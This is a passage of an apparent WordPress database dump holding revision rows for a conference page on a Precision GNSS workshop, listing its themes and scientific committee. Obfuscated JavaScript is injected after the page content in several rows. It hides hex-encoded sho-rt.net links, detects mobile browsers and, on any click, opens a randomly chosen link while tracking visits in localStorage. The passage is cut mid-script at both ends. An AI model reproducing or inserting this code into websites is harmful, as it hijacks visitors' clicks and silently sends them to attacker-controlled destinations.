_0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Precision GNSS: Technology Advances and Applications for Navigation and Mapping</strong>','','inherit','closed','closed','','3452-revision-v1','','','2022-12-16 14:13:36','2022-12-16 14:13:36','',3452,'https://gsw2023.com/?p=3485',0,'revision','',0),
(3486,1,'2022-12-16 14:14:16','2022-12-16 14:14:16','','w26m3','','inherit','open','closed','','w26m3','','','2022-12-16 14:14:16','2022-12-16 14:14:16','',3452,'https://gsw2023.com/wp-content/uploads/2022/12/w26m3.jpg',0,'attachment','image/jpeg',0),
(3487,1,'2022-12-16 14:14:34','2022-12-16 14:14:34','<p>[vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3480\" img_size=\"600x600\"][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5 style=\"text-align: justify;\">The Global Navigation Satellite Systems (GNSS) have become an indispensable component for a wide range of applications. With rapid advances in GNSS system development which currently includes four operational systems and various regional augmentation systems, high accuracy is increasingly demanded by many emerging applications. For examples, within-lane autonomous vehicle control requires dm or better positioning accuracy while dm accuracy is also demanded for smartphone-based navigation and mapping. Although high accuracy has been widely demonstrated, the use of low-cost GNSS receivers in mass-market applications present various challenges in order to achieve high accuracy with stringent requirements on system availability and integrity. This workshop will seek contributions that are addressing the related challenges. They can be research progress on the development of new concept, models, algorithms and systems for precise GNSS positioning (PPP, PPP-RTK, LEO etc) and integrated navigation systems (GNSS, INS, Vision etc), as well as novel applications to navigation and mapping including application system design, implementation, prototype, product and testing results.</h5>\n<h5>The workshop will be part of the ISPRS Geospatial Week 2023 and is hosted by the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) in parallel with several related geospatial workshops.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"peacoc\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"default_button\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"64\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"peacoc\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>\n<h6>Mathematical models and algorithms for precision GNSS</h6>\n</li>\n<li>\n<h6>Precise GNSS positioning algorithms (PPP, RTK, PPP-RTK etc)</h6>\n</li>\n<li>\n<h6>GNSS integrity monitoring and quality control algorithms</h6>\n</li>\n<li>\n<h6>GNSS augmentation algorithms and systems</h6>\n</li>\n<li>\n<h6>LEO-based satellite navigation and augmentation systems</h6>\n</li>\n<li>\n<h6>Atmospheric augmentation corrections for precision GNSS</h6>\n</li>\n<li>\n<h6>Precision GNSS with smartphones</h6>\n</li>\n<li>\n<h6>Precision GNSS with low-cost receivers</h6>\n</li>\n<li>\n<h6>Multi-sensor integrated systems (GNSS, INS, Vision etc)</h6>\n</li>\n<li>\n<h6>Precise positioning technologies in GNSS challenged environments</h6>\n</li>\n<li>\n<h6>Alternative technologies in GNSS denied environments</h6>\n</li>\n<li>\n<h6>Advanced software and hardware precision GNSS receivers</h6>\n</li>\n<li>\n<h6>Trends of future precision GNSS technology, systems and services</h6>\n</li>\n<li>\n<h6>Applications to navigation and mapping</h6>\n</li>\n</ul>\n<h6></h6>\n<h5><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>\n<h6>Yang Gao, University of Calgary, Canada</h6>\n</li>\n<li>\n<h6>Xiaohong Zhang, Wuhan University, China</h6>\n</li>\n<li>\n<h6>Ahmed El-Mowafy, Curtin University, Australia</h6>\n</li>\n<li>\n<h6>OlaØvstedal, Norwegian University of Life Sciences, Norway</h6>\n</li>\n<li>\n<h6>Jacek Paziewski, University of Warmia and Mazury in Olsztyn, Poland</h6>\n</li>\n<li>\n<h6>Augusto Mazzoni, Sapienza University of Rome, Italy</h6>\n</li>\n<li>\n<h6>Washington Ochieng, Imperial College of London, UK</h6>\n</li>\n<li>\n<h6>Nobuaki Kubo, Tokyo University of Marine Science and Technology, Japan</h6>\n</li>\n<li>\n<h6>Jinling Wang, University of New South Wales, Australia</h6>\n</li>\n<li>\n<h6>Charles Toth, Ohio State University, USA</h6>\n</li>\n<li>\n<h6>Byungwoon Park, Sejong University, South Korea</h6>\n</li>\n<li>\n<h6>Maorong Ge, German Research Centre for Geosciences (GFZ), Germany</h6>\n</li>\n<li>\n<h6>Michael Fu, Google, USA</h6>\n</li>\n<li>\n<h6>Chris Rizos, University of New South Wales, Australia</h6>\n</li>\n<li>\n<h6>Sunil Bisnath, York University, Canada</h6>\n</li>\n<li>\n<h6>Galera Monico, São Paulo State University, Brazil</h6>\n</li>\n<li>\n<h6>Paul Groves, University College of London, UK</h6>\n</li>\n<li>\n<h6>George Liu, Hong Kong Polytechnic University, Hong Kong</h6>\n</li>\n<li>\n<h6>Guanwen Huang, Chang’An University, China</h6>\n</li>\n<li>\n<h6>Hongzhou Yang, University of Calgary, Canada</h6>\n</li>\n</ul>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3486\" img_size=\"600x600\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','<strong>Precision GNSS: Technology Advances and Applications for Navigation and Mapping</strong>','','inherit','closed','closed','','3452-revision-v1','','','2022-12-16 14:14:34','2022-12-16 14:14:34','',3452,'https://gsw2023.com/?p=3487',0,'revision','',0),
(3488,1,'2022-12-16 14:14:55','2022-12-16 14:14:55','<p>[vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3480\" img_size=\"600x600\"][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5 style=\"text-align: justify;\">The Global Navigation Satellite Systems (GNSS) have become an indispensable component for a wide range of applications. With rapid advances in GNSS system development which currently includes four operational systems and various regional augmentation systems, high accuracy is increasingly demanded by many emerging applications. For examples, within-lane autonomous vehicle control requires dm or better positioning accuracy while dm accuracy is also demanded for smartphone-based navigation and mapping. Although high accuracy has been widely demonstrated, the use of low-cost GNSS receivers in mass-market applications present various challenges in order to achieve high accuracy with stringent requirements on system availability and integrity. This workshop will seek contributions that are addressing the related challenges. They can be research progress on the development of new concept, models, algorithms and systems for precise GNSS positioning (PPP, PPP-RTK, LEO etc) and integrated navigation systems (GNSS, INS, Vision etc), as well as novel applications to navigation and mapping including application system design, implementation, prototype, product and testing results.</h5>\n<h5>The workshop will be part of the ISPRS Geospatial Week 2023 and is hosted by the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) in parallel with several related geospatial workshops.</h5>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"peacoc\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column][vc_column_text]</p>\n<h1 style=\"text-align: center;\"><strong>CHAIRS</strong></h1>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"5px 0px 5px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"default_button\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"64\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"peacoc\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text]</p>\n<h5><strong><u>Themes of event:</u></strong></h5>\n<ul>\n<li>\n<h6>Mathematical models and algorithms for precision GNSS</h6>\n</li>\n<li>\n<h6>Precise GNSS positioning algorithms (PPP, RTK, PPP-RTK etc)</h6>\n</li>\n<li>\n<h6>GNSS integrity monitoring and quality control algorithms</h6>\n</li>\n<li>\n<h6>GNSS augmentation algorithms and systems</h6>\n</li>\n<li>\n<h6>LEO-based satellite navigation and augmentation systems</h6>\n</li>\n<li>\n<h6>Atmospheric augmentation corrections for precision GNSS</h6>\n</li>\n<li>\n<h6>Precision GNSS with smartphones</h6>\n</li>\n<li>\n<h6>Precision GNSS with low-cost receivers</h6>\n</li>\n<li>\n<h6>Multi-sensor integrated systems (GNSS, INS, Vision etc)</h6>\n</li>\n<li>\n<h6>Precise positioning technologies in GNSS challenged environments</h6>\n</li>\n<li>\n<h6>Alternative technologies in GNSS denied environments</h6>\n</li>\n<li>\n<h6>Advanced software and hardware precision GNSS receivers</h6>\n</li>\n<li>\n<h6>Trends of future precision GNSS technology, systems and services</h6>\n</li>\n<li>\n<h6>Applications to navigation and mapping</h6>\n</li>\n</ul>\n<h6></h6>\n<h5><strong><u>Scientific Committee:</u></strong></h5>\n<ul>\n<li>\n<h6>Yang Gao, University of Calgary, Canada</h6>\n</li>\n<li>\n<h6>Xiaohong Zhang, Wuhan University, China</h6>\n</li>\n<li>\n<h6>Ahmed El-Mowafy, Curtin University, Australia</h6>\n</li>\n<li>\n<h6>OlaØvstedal, Norwegian University of Life Sciences, Norway</h6>\n</li>\n<li>\n<h6>Jacek Paziewski, University of Warmia and Mazury in Olsztyn, Poland</h6>\n</li>\n<li>\n<h6>Augusto Mazzoni, Sapienza University of Rome, Italy</h6>\n</li>\n<li>\n<h6>Washington Ochieng, Imperial College of London, UK</h6>\n</li>\n<li>\n<h6>Nobuaki Kubo, Tokyo University of Marine Science and Technology, Japan</h6>\n</li>\n<li>\n<h6>Jinling Wang, University of New South Wales, Australia</h6>\n</li>\n<li>\n<h6>Charles Toth, Ohio State University, USA</h6>\n</li>\n<li>\n<h6>Byungwoon Park, Sejong University, South Korea</h6>\n</li>\n<li>\n<h6>Maorong Ge, German Research Centre for Geosciences (GFZ), Germany</h6>\n</li>\n<li>\n<h6>Michael Fu, Google, USA</h6>\n</li>\n<li>\n<h6>Chris Rizos, University of New South Wales, Australia</h6>\n</li>\n<li>\n<h6>Sunil Bisnath, York University, Canada</h6>\n</li>\n<li>\n<h6>Galera Monico, São Paulo State University, Brazil</h6>\n</li>\n<li>\n<h6>Paul Groves, University College of London, UK</h6>\n</li>\n<li>\n<h6>George Liu, Hong Kong Polytechnic University, Hong Kong</h6>\n</li>\n<li>\n<h6>Guanwen Huang, Chang’An University, China</h6>\n</li>\n<li>\n<h6>Hongzhou Yang, University of Calgary, Canada</h6>\n</li>\n</ul>\n<p>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3486\" img_size=\"600x600\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"peacoc\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( 